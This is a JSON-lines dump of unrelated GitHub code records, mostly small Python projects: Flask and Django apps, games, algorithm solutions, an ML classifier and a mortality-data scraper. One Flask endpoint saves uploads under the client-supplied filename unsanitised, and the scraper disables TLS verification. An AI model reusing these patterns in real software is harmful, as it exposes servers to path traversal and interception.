views.login_user, name=\"login_user\"),\n url(r\"^logout/$\", views.logout_user, name=\"logout_user\"),\n url(r\"^about/$\", views.about, name=\"about\"),\n url(r\"^close_task/(\\d+)$\", views.close_task, name=\"close_task\"),\n url(r\"^add_task/$\", views.add_task, name=\"add_task\"),\n url(r\"^edit_task/(\\d+)$\", views.edit_task, name=\"edit_task\"),\n url(r\"^delete_task/(\\d+)$\", views.delete_task, name=\"delete_task\"),\n)\n","repo_name":"nakhan98/Task-List","sub_path":"src/task_list/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"43597881084","text":"from flask import Flask,jsonify, request\nfrom inference import inference\nimport flask\nimport os\nimport 
flask_cors\n\n\napp = Flask(__name__)\nflask_cors.CORS(app=app)\napp.config['MAX_CONTENT_LENGTH'] = 10 * 1024 * 1024\n\n@app.route('/inference', methods=['POST'])\ndef predict():\n content = request.files['image']\n content.save(content.filename)\n label, prob = inference(os.path.join(\"./\", content.filename))\n os.remove(content.filename)\n return jsonify(result=label, probability=prob)\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=8081, threaded = True)\n\n","repo_name":"vmyanaACR/mask_detector","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"24290322689","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 8 20:36:19 2020\n\n@author: sandra\n\"\"\"\n\nimport itertools\n\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nfrom matplotlib.collections import LineCollection\nimport numpy as np\n\nimport cartopy.feature\nfrom cartopy.mpl.patch import geos_to_path\nimport cartopy.crs as ccrs\n\n\nfig = plt.figure()\nax = Axes3D(fig, xlim=[-180, 180], ylim=[-90, 90])\nax.set_zlim(bottom=0)\n\n\ntarget_projection = ccrs.PlateCarree()\n\nfeature = cartopy.feature.NaturalEarthFeature('physical', 'land', '110m')\ngeoms = feature.geometries()\n\ngeoms = [target_projection.project_geometry(geom, feature.crs)\n for geom in geoms]\n\npaths = list(itertools.chain.from_iterable(geos_to_path(geom) for geom in geoms))\n\n# At this point, we start working around mpl3d's slightly broken interfaces.\n# So we produce a LineCollection rather than a PathCollection.\nsegments = []\nfor path in paths:\n vertices = [vertex for vertex, _ in path.iter_segments()]\n vertices = np.asarray(vertices)\n segments.append(vertices)\n\nlc = LineCollection(segments, color='black')\n\nax.add_collection3d(lc)\n\nax.set_xlabel('X')\nax.set_ylabel('Y')\nax.set_zlabel('Height')\n\nplt.show()","repo_name":"sandraaaaa96/folium-maps","sub_path":"ruffduff/3D_basemap_mpl.py","file_name":"3D_basemap_mpl.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27257360478","text":"from copy import deepcopy\n\n\ndef bunny_multiplication_func(play_field_copy, bunny, player_is_alive):\n for x, y in directions.values():\n new_bunny_row, new_bunny_column = bunny[0] + x, bunny[1] + y\n if (0 <= new_bunny_row < number_of_rows) and (0 <= new_bunny_column < number_of_columns):\n if play_field_copy[new_bunny_row][new_bunny_column] == \"P\":\n player_is_alive = False\n play_field_copy[new_bunny_row][new_bunny_column] = \"B\"\n\n return play_field_copy, player_is_alive\n\n\ndef bunnies_turn_func(play_field, player_status):\n player_is_alive = player_status\n play_field_copy = deepcopy(play_field)\n\n for r in range(number_of_rows):\n for c in range(number_of_columns):\n if play_field[r][c] == \"B\":\n bunny = [r, c]\n play_field_copy, player_is_alive = bunny_multiplication_func(play_field_copy, bunny, player_is_alive)\n play_field = play_field_copy\n return play_field, player_is_alive\n\n\ndef player_turn_func(play_field, player, movement):\n player_is_alive = True\n player_escapes = False\n new_row, new_column = player[0] + movement[0], player[1] + movement[1]\n if not (0 <= new_row < number_of_rows) or not (0 <= new_column < number_of_columns):\n play_field[player[0]][player[1]] = \".\"\n player_escapes = True\n elif play_field[new_row][new_column] == \"B\":\n 
player_is_alive = False\n play_field[player[0]][player[1]] = \".\"\n player = [new_row, new_column]\n else:\n play_field[player[0]][player[1]] = \".\"\n player = [new_row, new_column]\n play_field[player[0]][player[1]] = \"P\"\n\n return play_field, player, player_is_alive, player_escapes\n\n\nnumber_of_rows, number_of_columns = map(int, input().split())\n\nbunny_lair = list()\nplayer_position = list()\nplayer_alive = True\nplayer_wins = False\n\nfor row in range(number_of_rows):\n current_row = list(input())\n if \"P\" in current_row:\n player_position = [row, current_row.index(\"P\")]\n bunny_lair.append(current_row)\n\nmove_commands = list(input())\n\ndirections = {\n \"U\": (-1, 0),\n \"D\": (1, 0),\n \"L\": (0, -1),\n \"R\": (0, 1)\n}\n\nfor move in move_commands:\n if player_wins:\n break\n if not player_alive:\n break\n bunny_lair, player_position, player_alive, player_wins = \\\n player_turn_func(bunny_lair, player_position, directions[move])\n bunny_lair, player_alive = bunnies_turn_func(bunny_lair, player_alive)\n\n\nfor row in range(number_of_rows):\n print(*bunny_lair[row], sep=\"\")\n\nif player_wins:\n print(f\"won: {player_position[0]} {player_position[1]}\")\nelse:\n print(f\"dead: {player_position[0]} {player_position[1]}\")\n","repo_name":"Moramarth/SoftUni-Python-Advanced-january-2023","sub_path":"multidimensional_lists/first_exercise_10_radioactive_mutant_vampire_bunnies.py","file_name":"first_exercise_10_radioactive_mutant_vampire_bunnies.py","file_ext":"py","file_size_in_byte":2705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12891340158","text":"from functools import lru_cache\n\n\nclass Solution:\n def minimumOneBitOperations(self, n: int) -> int:\n ans = 0\n for i, ch in enumerate(reversed(bin(n)), 1):\n if ch == '1':\n ans = 2 ** i - ans - 1\n return ans\n\n\nclass Solution1:\n def minimumOneBitOperations(self, n: int) -> int:\n ans = unset = 0\n for ch in reversed(bin(n)):\n unset = unset * 2 + 1\n if ch == '1':\n ans = unset - ans\n return ans\n\n\nclass Solution2:\n def minimumOneBitOperations(self, n: int) -> int:\n ans, i = 0, 0\n unset = 1\n while n:\n if n % 2:\n ans = unset - ans\n unset = unset * 2 + 1\n n //= 2\n i += 1\n return ans\n\n\nclass Solution3:\n def minimumOneBitOperations(self, n: int) -> int:\n if not n:\n return 0\n\n @lru_cache(None)\n def unset_bit(i) -> int:\n \"\"\" 1...0100...0 -> 1...0110...0 -> 1...0010...0 \"\"\"\n if not i:\n return 1\n return set_bit(i - 1) + unset_bit(i - 1) + 1\n\n @lru_cache(None)\n def set_bit(i) -> int:\n \"\"\" 1...0000...0 -> 1...0010...0 -> 1...0110...0 -> 1...0100...0 \"\"\"\n if not i:\n return 1\n return set_bit(i - 1) + unset_bit(i - 1) + 1\n\n pos = [i for i, ch in enumerate(reversed(bin(n))) if ch == '1']\n\n ans = 0\n for p in pos:\n ans = unset_bit(p) - ans\n return ans\n\n\ndef test():\n sol = Solution()\n\n print('Test 1... ', end='')\n assert sol.minimumOneBitOperations(n=3) == 2\n print('OK')\n\n print('Test 2... 
', end='')\n assert sol.minimumOneBitOperations(n=6) == 4\n print('OK')\n\n\nif __name__ == '__main__':\n test()\n","repo_name":"Vskesha/leetcode_solutions","sub_path":"leetcode_solutions/p1611_minimum_one_bit_operations_to_make_integers_zero.py","file_name":"p1611_minimum_one_bit_operations_to_make_integers_zero.py","file_ext":"py","file_size_in_byte":1802,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"27856808084","text":"# https://programmers.co.kr/learn/courses/30/lessons/81301\n\n# 처음에 시도했던 코드 처음에 아무생각도 안나서 그냥 때려넣은 코드\n# def solution(s): # 무지성 코드\n# s = s.replace(\"one\", \"1\").replace(\"two\", \"2\").replace(\n# \"three\", \"3\").replace(\"four\", \"4\").replace(\"five\", \"5\").replace(\"six\", \"6\").replace(\"seven\", \"7\").replace(\"eight\", \"8\").replace(\"nine\", \"9\").replace(\"zero\", \"0\")\n# answer = int(s)\n# return answer\n\ndef solution(s):\n num_dict = {\"one\": \"1\", \"two\": \"2\", \"three\": \"3\", \"four\": \"4\", \"five\": \"5\",\n \"six\": \"6\", \"seven\": \"7\", \"eight\": \"8\", \"nine\": \"9\", \"zero\": \"0\"}\n # 변환할 값들을 딕셔너리에 넣고 반복문으로 처리함\n for key in num_dict.keys():\n s = s.replace(key, num_dict[key])\n answer = int(s)\n return answer\n","repo_name":"thecode00/Algorithm-Problem-Solve","sub_path":"Programmers/Python/Level 1/숫자 문자열과 영단어/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"17809510260","text":"import random\n\n\nclass Character:\n def __init__(self,strength, dexterity, constitution, intelligence, wisdom, charisma):\n self.strength=strength\n self.dexterity=dexterity\n self.constitution=constitution\n self.intelligence=intelligence\n self.wisdom=wisdom\n self.charisma=charisma\n self.hitpoint=self.constitution*30+50\n\n def show_stats(self):\n print(\"strength\",self.strength)\n print(\"dexterity\",self.dexterity)\n print(\"constitution\",self.constitution)\n print(\"intelligence\",self.intelligence)\n print(\"wisdom\",self.wisdom)\n print(\"charisma\",self.charisma)\n \n def show_hitpoints(self):\n print(\"hitpoint\",self.hitpoint)\n\n def attack(self):\n return random.randint(1,self.strength)\n \n def defence(self,defen):\n a=random.randint(0,20)\n if(a>=self.dexterity):\n defen=defen-self.attack\n \n def heal(self,healValue):\n self.hitpoint+=healValue\n\nif __name__ == \"__main__\":\n characterA=Character(6,7,8,9,10,11)\n characterA.show_hitpoints()\n characterA.heal(10)\n characterA.show_hitpoints()\n characterA.show_stats()\n characterA.defence(15)\n characterA.show_stats()\n \n\n\n\n\n ","repo_name":"tgtbayern/intro","sub_path":"7forClass.py","file_name":"7forClass.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"26674270698","text":"if __name__ == \"__main__\":\n quit()\n\nfrom tools import *\nimport framework\nimport state_title\nimport state_lobby\nimport sound\n\nimport object\nimport gui\nimport gmap\nimport tank\nimport shell\nimport sprite\nimport ending\nimport environment as env\nimport supply\nimport inventory\n\n_is_game_over = False\n_winner = 0\n_is_edit_mode = False\n\nSCENE_STATES = ( \"Control\", \"Fire\", \"Supply\", \"Ending\" )\nmap_index = 0\n\ndef enter():\n from state_lobby import get_mode, get_difficulty\n mode = get_mode()\n\n global scene_state\n scene_state = SCENE_STATES[0]\n \n global map_index\n 
map_index = state_lobby.crnt_map_index + 1\n\n object.enter()\n gmap.enter()\n shell.enter()\n gui.enter()\n tank.enter()\n sprite.enter()\n env.enter(map_index)\n ending.enter()\n sound.enter('battle')\n supply.enter()\n inventory.enter()\n\n #map_index = -4\n gmap.read_mapfile(map_index, mode)\n tank.apply_difficulty(get_difficulty())\n\n global _is_game_over\n _is_game_over = False\n \n global _is_edit_mode\n if map_index > 0:\n sound.play_battle_bgm(map_index)\n _is_edit_mode = False\n else:\n _is_edit_mode = True\n\n\ndef exit():\n inventory.exit()\n env.exit()\n sprite.exit()\n shell.exit()\n tank.exit()\n gui.exit()\n object.exit()\n ending.exit()\n gmap.exit()\n sound.exit()\n supply.exit()\n\ndef update():\n global _is_game_over, _winner\n\n object.update()\n sprite.update()\n gui.update()\n tank.update()\n\n if _is_edit_mode:\n return\n if scene_state == \"Ending\":\n if _is_game_over == False:\n if _winner == 0:\n sound.play_bgm('win')\n elif _winner == -1:\n sound.play_bgm('lose')\n else:\n assert(0)\n\n _is_game_over = True\n if ending.update() == False:\n framework.change_state(state_title)\n\ndef draw():\n\n gmap.draw()\n gui.draw()\n inventory.draw()\n object.draw()\n sprite.draw()\n gmap.draw_debugs()\n\n if _is_game_over:\n ending.draw(_winner)\n \n update_canvas()\n\ndef handle_events(events=None):\n if events == None:\n events = get_events()\n event : Event\n\n if gmap.is_draw_mode == True:\n gmap.handle_draw_mode_events(events)\n return\n\n for event in events:\n if event.type == SDL_QUIT:\n framework.change_state(state_title)\n return\n\n tank.handle_event(event)\n\n if event.type == SDL_KEYDOWN:\n if event.key == SDLK_F1:\n gmap.start_draw_mode()\n\ndef pause():\n pass\ndef resume():\n pass\n\n\ndef set_state(state : str):\n assert(state in SCENE_STATES)\n\n global scene_state\n scene_state = state\n\ndef set_winner(winner):\n global _winner\n _winner = winner\n\ndef get_gravity():\n gravity = 9.8\n if map_index == 4:\n return gravity * 0.7\n return gravity","repo_name":"SaintPingu/2DGP-Project","sub_path":"state_battle.py","file_name":"state_battle.py","file_ext":"py","file_size_in_byte":2900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15897829351","text":"import os\nimport pandas as pd\nimport csv\nimport numpy as np\nimport warnings\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestClassifier,GradientBoostingClassifier,AdaBoostClassifier\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.model_selection import train_test_split\n# Train two Random Forest models\nwarnings.filterwarnings('ignore') \n\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\n\n# Load and prepare the datasets\ndata = pd.read_csv(\"../dataset_tl/Parkinson_CV.tab\", delimiter=\"\\t\")\nprint(data)\n\n\n# Filter the last column as the label\nlabel = data.iloc[:, -1]\n\nlabel = label.replace({'Co': 0, 'Pt': 1})\n\n# Remove the last column from the datasets\ndata = data.iloc[:, :-1]\n\n# Split the data into training and testing sets\nX_train, X_test, y_train, y_test = train_test_split(data, label, test_size=0.2, random_state=42)\n\n\n#Ensemble model\n# Instantiate the models\nrf_model = RandomForestClassifier(n_estimators=100, random_state=42)\ngb_model = GradientBoostingClassifier(n_estimators=100, random_state=42)\nada_model = AdaBoostClassifier(n_estimators=100, random_state=42)\n\n# Train the models\nrf_model.fit(X_train, 
y_train)\ngb_model.fit(X_train, y_train)\nada_model.fit(X_train, y_train)\n\n# Make predictions on the test set\nrf_pred = rf_model.predict(X_test)\ngb_pred = gb_model.predict(X_test)\nada_pred = ada_model.predict(X_test)\n\n# Combine the predictions using a simple majority vote\nensemble_pred = np.round((rf_pred + gb_pred + ada_pred) / 3)\n\n# Evaluate the ensemble's accuracy\nensemble_acc = accuracy_score(y_test, ensemble_pred)\nprint(\"Ensemble accuracy:\", ensemble_acc)\n\n#transfer learning\nprint('***** Transfer Learning ***')\n\ntest = pd.read_csv(\"../dataset_tl/Parkinson_CV_dataset2_transformed.tab\", delimiter=\"\\t\")\n\n# Filter the last column as the label\nlabel = test.iloc[:, -1]\n\nlabel = label.replace({'Co': 0, 'Pt': 1})\n# Remove the last column from the datasets\ntest = test.iloc[:, :-1]\n# Make predictions on the test set\nrf_pred = rf_model.predict(test)\ngb_pred = gb_model.predict(test)\nada_pred = ada_model.predict(test)\n\n# Combine the predictions using a simple majority vote\nensemble_pred = np.round((rf_pred + gb_pred + ada_pred) / 3)\n\n# Evaluate the ensemble's accuracy\nensemble_acc = accuracy_score(label, ensemble_pred)\nprint(\"Ensemble accuracy:\", ensemble_acc)\n","repo_name":"SwagarikaGiri/Parkinson-detection-from-gait","sub_path":"codes_2/transfer_learning.py","file_name":"transfer_learning.py","file_ext":"py","file_size_in_byte":2384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"21628944292","text":"#!/usr/bin/env python3\n# coding: utf-8\n\nimport io\nimport json\nimport uuid\nimport time\nimport py7zr\nimport base64\nimport chardet\nimport requests\nimport warnings\nimport urllib3\nimport datetime\nimport unidecode\nimport traceback\nimport itertools\n\nimport perkins\nimport perkins.requests\nimport perkins.input.powerbi\n\nfrom bs4 import BeautifulSoup\nfrom zipfile import ZipFile\n\nimport pandas as pd\nimport numpy as np\n\nwarnings.filterwarnings('ignore', category=urllib3.exceptions.InsecureRequestWarning)\nwarnings.filterwarnings('ignore', category=FutureWarning)\nwarnings.filterwarnings('ignore', category=UserWarning)\nwarnings.filterwarnings('ignore', category=pd.errors.PerformanceWarning)\n\n\ndef get_iso3166(adm1_df, iso):\n global iso_geo_names, geo_names\n\n adm1_index = map(lambda _: unidecode.unidecode(_.lower()), adm1_df)\n adm1_index = list(adm1_index)\n\n country_geo_names = geo_names[geo_names['geocode'].str.startswith(iso)]\n country_geo_names = country_geo_names[\n ~country_geo_names.index.duplicated(keep='first')\n ]\n\n adm1_index = country_geo_names.loc[adm1_index]\n\n adm1_index['name'] = iso_geo_names.loc[\n adm1_index['geocode'].values\n ][0].values\n adm1_index.index = adm1_df\n\n return adm1_index\n\n\ndef get_population():\n geo_sa_df = pd.read_csv('./update/south.america.population.csv')\n geo_sa_df_ = geo_sa_df.groupby([\n 'name_0', 'name_1', 'name_2'\n ])['population'].sum()\n\n # All adm level 2 with population over 100k or biggest for each adm level 1\n sa_cities = pd.DataFrame([\n *geo_sa_df_[geo_sa_df_ > 1e5].index.to_list(),\n *geo_sa_df_.groupby(level=['name_0', 'name_1']).idxmax().values\n ]).drop_duplicates()\n\n sa_cities.columns = ['name_0', 'name_1', 'name_2']\n sa_cities = sa_cities.sort_values(['name_0', 'name_1', 'name_2'])\n\n geo_sa_df = geo_sa_df.set_index(['name_0', 'name_1', 'name_2', 'name_3'])\n\n return geo_sa_df, sa_cities\n\n\nARTICLES = ['de', 'del', 'los', 'las']\ndef do_title(title):\n try:\n title = 
title.encode('cp1252').decode('utf-8')\n except:\n pass\n\n title = title.lower().capitalize().split(' ')\n title = title[:1] + [\n _.capitalize() if _ not in ARTICLES else _ for _ in title[1:]\n ]\n\n return ' '.join(title)\n\n\nDF_ADM1_COLS = [\n 'iso_code', 'country_name', 'adm1_isocode',\n 'adm1_name', 'frequency', 'date', 'deaths'\n]\nDF_ADM2_COLS = [\n 'iso_code', 'country_name', 'adm1_isocode',\n 'adm1_name', 'adm2_name', 'frequency',\n 'date', 'deaths'\n]\n\ndef storage_format(df, iso_code=None, **kwargs):\n df = df.reset_index()\n df['iso_code'] = iso_code\n\n for k, v in kwargs.items():\n df[k] = v\n\n adm1_df = df['adm1_name'].unique()\n adm1_df = get_iso3166(adm1_df, iso_code)\n\n df['adm1_isocode'] = df['adm1_name']\n df['adm1_isocode'] = df['adm1_isocode'].map(\n adm1_df['geocode'].to_dict()\n )\n\n df['adm1_name'] = df['adm1_name'].map(\n adm1_df['name'].to_dict()\n )\n\n df['deaths'] = df['deaths'].astype(int)\n\n return df\n\n\nCHILE_BASE_URL = 'https://deis.minsal.cl/wp-admin/admin-ajax.php'\nCHILE_INDEX_PARAMS = {\n 'action': 'wp_ajax_ninja_tables_public_action',\n 'table_id': '2889',\n 'target_action': 'get-all-data',\n 'default_sorting': 'manual_sort',\n}\nCHL_ADM1_MAP = {\n 'Metropolitana de Santiago': 'Santiago Metropolitan',\n 'La Araucanía': 'Araucania',\n \"Libertador B. O'Higgins\": \"O'Higgins\",\n 'Magallanes y de La Antártica Chilena': 'Magallanes',\n 'Aisén del Gral. C. Ibáñez del Campo': 'Aisen'\n}\ndef update_chile():\n req = requests.get(\n CHILE_BASE_URL,\n params=CHILE_INDEX_PARAMS,\n headers=perkins.DEFAULT_HEADERS\n )\n def_file = next(\n _['value'] for _ in req.json() if (\n (_['value']['tags'] == 'defunciones') and\n ('semanal' in _['value']['nombre'].lower())\n )\n )\n\n req = perkins.requests.do_request(def_file['ver'], max_retry=10)\n fzip = ZipFile(io.BytesIO(req.content))\n\n # Process metadata\n meta_file = next(\n (_ for _ in fzip.namelist() if _.endswith('xlsx')),\n None\n )\n meta_file = fzip.open(meta_file)\n\n meta_df = pd.read_excel(meta_file, header=None, index_col=None)\n meta_df = meta_df.iloc[3:, 1:].T.set_index(keys=3).T\n meta_df.columns = [\n unidecode.unidecode(_.lower()).replace(' ', '_') for _ in meta_df.columns\n ]\n\n # Process def file\n data_file = next(\n (_ for _ in fzip.namelist() if _.endswith('csv')),\n None\n )\n data_file = fzip.open(data_file)\n\n data_sample = data_file.read(4096)\n data_encoding = chardet.detect(data_sample)\n data_file.seek(0)\n\n chile_df = pd.read_csv(\n data_file,\n sep=';',\n encoding=data_encoding['encoding'],\n header=None,\n index_col=None\n )\n\n chile_df.columns = meta_df['nombre_de_la_variable'].str.lower().values\n chile_df['fecha_def'] = pd.to_datetime(chile_df['fecha_def'])\n\n chile_df = chile_df.sort_values('fecha_def')\n chile_df['glosa_reg_res'] = chile_df['glosa_reg_res'].str.replace(\n r'^Del* +', '', regex=True\n )\n\n chile_df['glosa_reg_res'] = chile_df['glosa_reg_res'].replace(CHL_ADM1_MAP)\n chile_df = chile_df[chile_df['glosa_reg_res'] != 'Ignorada']\n\n df = chile_df.groupby([\n 'glosa_reg_res', 'glosa_comuna_residencia', 'fecha_def'\n ])['ano_def'].count().rename('defunciones')\n df = df.reset_index()\n df.columns = ['adm1_name', 'adm3_name', 'date', 'deaths']\n\n df['adm3_name'] = df['adm3_name'].replace({\n 'Coihaique': 'Coyhaique',\n 'Ránquil': 'Ranquil',\n 'Los Ángeles': 'Los Angeles',\n 'Aisén': 'Aysén',\n 'Los Álamos': 'Los Alamos',\n })\n df = df[df['adm3_name'] != 'Antártica']\n\n global geo_sa_df, sa_cities\n\n geo_sa_df_ = 
geo_sa_df.loc['Chile'].reset_index(['name_2'])['name_2']\n geo_sa_df_ = geo_sa_df_.reset_index('name_1', drop=True)\n geo_sa_df_.index = geo_sa_df_.index.map(unidecode.unidecode).str.lower()\n\n df['adm2_name'] = geo_sa_df_[\n df['adm3_name'].str.lower().apply(unidecode.unidecode)\n ].values\n\n df_deaths = df[['adm1_name', 'date', 'deaths']]\n df_deaths = df_deaths.groupby(['adm1_name', 'date']).sum()\n df_deaths = df_deaths.sort_index()\n df_deaths = storage_format(\n df_deaths,\n iso_code='CL',\n frequency='daily',\n country_name='Chile'\n )\n df_deaths = df_deaths[DF_ADM1_COLS]\n\n df_cities = df.drop('adm3_name', axis=1)\n df_cities = df_cities.groupby(['adm1_name', 'adm2_name', 'date']).sum()\n\n cities = sa_cities[sa_cities['name_0'] == 'Chile']['name_2']\n cities = pd.concat([cities, cities.apply(unidecode.unidecode)]).drop_duplicates()\n\n df_cities = df_cities.reindex(cities.unique(), level='adm2_name').dropna()\n\n df_cities = df_cities.sort_index()\n df_cities = storage_format(\n df_cities,\n iso_code='CL',\n frequency='daily',\n country_name='Chile'\n )\n df_cities = df_cities[DF_ADM2_COLS]\n\n return {\n 'south.america.subnational.mortality': df_deaths,\n 'south.america.cities.mortality': df_cities\n }\n\n\nBR_BASE_URL = 'https://transparencia.registrocivil.org.br/especial-covid'\nBR_STATES_URL = 'https://raw.githubusercontent.com/datasets-br/state-codes/master/data/br-state-codes.csv'\nBR_STATES_FETCH_URL = 'https://transparencia.registrocivil.org.br/api/covid-cardiaco'\n\nBR_STATES = 'AC AL AM AP BA CE DF ES GO MA MG MS MT PA PB PE PI PR RJ RN RO RR RS SC SE SP TO'.split(' ')\nBR_STATES_PARAMS = {\n 'start_date': '2020-03-16',\n 'end_date': pd.to_datetime('now').strftime('%Y-%m-%d'),\n 'state': 'all',\n 'city_id': 'all',\n 'chart': 'chartCardiac4',\n 'places[]': [\n 'HOSPITAL', 'DOMICILIO', 'VIA_PUBLICA', 'OUTROS'\n ],\n 'diffCity': False,\n 'cor_pele': 'I'\n}\ndef update_brazil():\n # TODO: cities!\n state_codes = pd.read_csv(BR_STATES_URL)\n state_codes = state_codes.set_index('subdivision')\n\n session = requests.session()\n\n session_headers = perkins.DEFAULT_HEADERS.copy()\n session.get(\n BR_BASE_URL,\n headers=session_headers,\n timeout=30,\n verify=False,\n )\n\n if 'XSRF-TOKEN' in session.cookies:\n session_headers['XSRF-TOKEN'] = session.cookies['XSRF-TOKEN']\n\n df = None\n for state in BR_STATES:\n states_params = BR_STATES_PARAMS.copy()\n states_params['state'] = state\n\n req = session.get(\n BR_STATES_FETCH_URL,\n params=states_params,\n headers=session_headers,\n timeout=90,\n verify=False,\n )\n reqj = req.json()\n\n if 'chart' not in reqj:\n continue\n\n data = pd.DataFrame.from_dict(reqj['chart'])\n data = data.applymap(\n lambda _: _[0]['total'] if type(_) == list else _\n ).T\n data.index = pd.to_datetime(data.index)\n\n data = data.sum(axis=1)\n data = data.reset_index()\n data.columns = ['date', 'deaths']\n data['adm1_name'] = state\n\n df = pd.concat([df, data])\n time.sleep(1.)\n\n df['adm1_name'] = df['adm1_name'].map(\n state_codes['name'].to_dict()\n )\n\n df = df.set_index(['adm1_name', 'date'])\n df = df.sort_index()\n\n df_deaths = storage_format(\n df,\n iso_code='BR',\n frequency='daily',\n country_name='Brazil'\n )\n df_deaths = df_deaths[DF_ADM1_COLS]\n\n return {\n 'south.america.subnational.mortality': df_deaths,\n }\n\n\nECU_PROVINCIAS_MAP = {\n 'Santo Domingo de los Tsachilas': 'Santo Domingo de los Tsachilas',\n 'Sto Dgo Tsachil': 'Santo Domingo de los Tsachilas',\n 'Sto Domingo Tsachilas': 'Santo Domingo de los 
Tsachilas'\n}\nECU_CANTONES_MAP = {\n 'Alfredo Baquerizo Moreno (jujan)': 'Alfredo Baquerizo Moreno',\n 'Baños de Agua Santa': 'Baños',\n 'El Empalme': 'Empalme',\n 'Francisco de Orellana': 'Orellana',\n 'General Villamil (playas)': 'Playas',\n 'Rio Verde': 'Rioverde',\n 'Yaguachi': 'San Jacinto de Yaguachi'\n}\nECUADOR_URL = 'https://www.registrocivil.gob.ec/registro-civil-cifras-defunciones-2/'\ndef update_ecuador():\n cdata = requests.get(\n ECUADOR_URL,\n verify=False,\n headers=perkins.DEFAULT_HEADERS,\n timeout=120\n )\n cdata = BeautifulSoup(cdata.text, 'html.parser')\n\n cdata_btns = cdata.find_all('tr')\n download_url = next(\n _ for _ in cdata_btns if 'defunciones generales' in _.text.lower()\n ).findChild('a').attrs['href']\n\n cdata = perkins.requests.do_request(\n download_url,\n verify=False,\n headers=perkins.DEFAULT_HEADERS,\n timeout=30\n )\n\n dept_engine = 'xlrd'\n if (\n download_url.endswith('xlsx') or\n (\n 'Content-Location' in cdata.headers and\n cdata.headers['Content-Location'].endswith('xlsx')\n )\n ):\n dept_engine = 'openpyxl'\n\n df = pd.read_excel(cdata.content, engine=dept_engine, header=None)\n df = df[~df.isna().all(axis=1)]\n\n try:\n df_columns = [_.encode('cp1252').decode('utf-8') for _ in df.iloc[0]]\n except:\n df_columns = df.iloc[0]\n\n df_columns = [unidecode.unidecode(_) for _ in df_columns]\n df.columns = [_.lower().replace(' ', '_') for _ in df_columns]\n df = df.iloc[1:]\n\n df = df[df['zona'] != 'ND']\n df = df.drop(['zona', 'mes', 'dia'], axis=1)\n df.iloc[:, :3] = df.iloc[:, :3].applymap(do_title)\n\n df['provincia'] = df['provincia'].replace(ECU_PROVINCIAS_MAP)\n df['canton'] = df['canton'].replace(ECU_CANTONES_MAP)\n\n if df['fecha_defuncion'].dtype == np.int64:\n df_td = df['fecha_defuncion'].apply(\n lambda _: pd.Timedelta(days=_)\n )\n df['fecha_defuncion'] = pd.to_datetime('1899/12/30') + df_td\n\n df = df.groupby([\n 'provincia', 'canton', 'fecha_defuncion'\n ])['parroquia'].count()\n\n df = df.reset_index()\n df.columns = ['adm1_name', 'adm2_name', 'date', 'deaths']\n\n df_deaths = df.groupby(['adm1_name', 'date']).sum()\n df_deaths = df_deaths.sort_index()\n df_deaths = storage_format(\n df_deaths,\n iso_code='EC',\n frequency='daily',\n country_name='Ecuador'\n )\n df_deaths = df_deaths[DF_ADM1_COLS]\n\n global sa_cities\n\n cities = sa_cities[sa_cities['name_0'] == 'Ecuador']['name_2']\n cities = pd.concat([cities, cities.apply(unidecode.unidecode)]).drop_duplicates()\n\n df_cities = df.set_index(['adm1_name', 'adm2_name', 'date'])\n df_cities = df_cities.reindex(cities.unique(), level='adm2_name').dropna()\n\n df_cities = df_cities.sort_index()\n df_cities = storage_format(\n df_cities,\n iso_code='EC',\n frequency='daily',\n country_name='Ecuador'\n )\n df_cities = df_cities[DF_ADM2_COLS]\n\n return {\n 'south.america.subnational.mortality': df_deaths,\n 'south.america.cities.mortality': df_cities\n }\n\n\nCOLOMBIA_TOKEN = 'eyJrIjoiNzU4ZjUwNGEtNjlhNy00NmU4LWJmYTktYTY1YTZiMGFkNjIyIiwidCI6ImJmYjdlMTNhLTdmYjctNDAxNi04MzBjLWQzNzE2ZThkZDhiOCJ9'\nCOLOMBIA_API_URL = 'https://wabi-paas-1-scus-api.analysis.windows.net'\nCOLOMBIA_API_URL = COLOMBIA_API_URL + '/public/reports/querydata?synchronous=true'\ndef update_colombia():\n # This may fail in the future due to a change in the dashboards' uri\n # TODO: fetch directly from: https://experience.arcgis.com/experience/d9bfa6a650a249099b5f290a6c454804/?draft=true\n resource_key = json.loads(base64.b64decode(COLOMBIA_TOKEN))['k']\n\n headers = perkins.DEFAULT_HEADERS.copy()\n 
